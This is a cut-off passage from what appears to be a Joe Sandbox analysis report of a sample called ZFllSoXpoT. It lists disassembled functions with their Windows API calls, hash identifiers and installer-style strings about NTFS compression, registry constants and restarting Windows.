                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString$FileMessageModuleName
                                                                            • String ID:
                                                                            • API String ID: 704749118-0
                                                                            • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                            • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                                            • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                            • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                                              • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                                              • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                            • IsRectEmpty.USER32(?), ref: 0044E963
                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                            • String ID:
                                                                            • API String ID: 855768636-0
                                                                            • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                            • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                                            • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                            • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                                            APIs
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                                            • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: OffsetRect
                                                                            • String ID:
                                                                            • API String ID: 177026234-0
                                                                            • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                            • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                                            • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                            • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 00417270
                                                                            • SetCursor.USER32(00000000), ref: 004172B3
                                                                            • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                            • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                            • String ID:
                                                                            • API String ID: 1959210111-0
                                                                            • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                            • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                                            • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                            • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                                            APIs
                                                                            • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                                            • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                                            • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                                            • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                            • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                            • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                                            APIs
                                                                            • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                            • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                            • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                            • String ID:
                                                                            • API String ID: 4025006896-0
                                                                            • Opcode ID: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                            • Instruction ID: e8d232a05c88a2160d81946a52d6ac90de0a8bd7e5396313334bc6410d622602
                                                                            • Opcode Fuzzy Hash: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                            • Instruction Fuzzy Hash: 7B011B722401047BDA10EB6DED81E9B3799D719314B11413BBA15E72A1D7369C154BAC
                                                                            APIs
                                                                            • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                            • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                            • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                            • String ID:
                                                                            • API String ID: 4071923889-0
                                                                            • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                            • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                                            • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                            • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                            • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                            • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                            • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                                            Strings
                                                                            • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                                            • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                            • API String ID: 1452528299-1392080489
                                                                            • Opcode ID: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                            • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                                            • Opcode Fuzzy Hash: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                                            • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                                            Strings
                                                                            • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                                            • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                                            • Setting NTFS compression on file: %s, xrefs: 00470867
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                            • API String ID: 1452528299-3038984924
                                                                            • Opcode ID: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                            • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
                                                                            • Opcode Fuzzy Hash: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                                            • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                            • String ID:
                                                                            • API String ID: 4283692357-0
                                                                            • Opcode ID: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                            • Instruction ID: 88a6b2d0cd2ebf9d052afffcb5c4be27c29a8e8e48dcb03e602a07ae18d4e81c
                                                                            • Opcode Fuzzy Hash: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                                            • Instruction Fuzzy Hash: E3F05EB6B4470176EA10B6B69C8BF2B229C9F54745F10883BBA00EF2C3D97CDC04962D
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CountSleepTick
                                                                            • String ID:
                                                                            • API String ID: 2227064392-0
                                                                            • Opcode ID: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                            • Instruction ID: e9c2c7e2fc271270d41d52dba3350464f1e42bdffd51bbfd166b1ef271046f5a
                                                                            • Opcode Fuzzy Hash: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                                            • Instruction Fuzzy Hash: 93E02B7130964845CA24B2BE28C37BF4A88CB8536AB14453FF08CD6242C42C4D05956E
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                            • String ID:
                                                                            • API String ID: 215268677-0
                                                                            • Opcode ID: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                            • Instruction ID: 3331d84468cd062744280f6e1aa24963878bc2b2d96e3aea022572b3ec77581d
                                                                            • Opcode Fuzzy Hash: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                                            • Instruction Fuzzy Hash: 70F030716843016BD600EAB5CC82E9B77DCEB44754F04893E7E98D72C1DA79DC08AB66
                                                                            APIs
                                                                            • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                            • IsWindowVisible.USER32(?), ref: 0042426D
                                                                            • IsWindowEnabled.USER32(?), ref: 00424277
                                                                            • SetForegroundWindow.USER32(?), ref: 00424281
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                            • String ID:
                                                                            • API String ID: 2280970139-0
                                                                            • Opcode ID: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                            • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                            • Opcode Fuzzy Hash: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                                            • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                            APIs
                                                                            • GlobalHandle.KERNEL32 ref: 00406287
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                            • String ID:
                                                                            • API String ID: 2167344118-0
                                                                            • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                            • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                            • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                            • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                            APIs
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                                            Strings
                                                                            • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                            • API String ID: 3535843008-1938159461
                                                                            • Opcode ID: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                            • Instruction ID: 3bf0094b3715a844c7fa4d69accdb7e726d223c3dcefaf8b2e4f531663087c06
                                                                            • Opcode Fuzzy Hash: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                            • Instruction Fuzzy Hash: 5F814174E00149AFCB10DF95D881ADEBBF9EF48314F5081AAE814B7392D7389E05CB99
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                                            • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                                            Strings
                                                                            • Will not restart Windows automatically., xrefs: 00483176
                                                                            Memory Dump Source
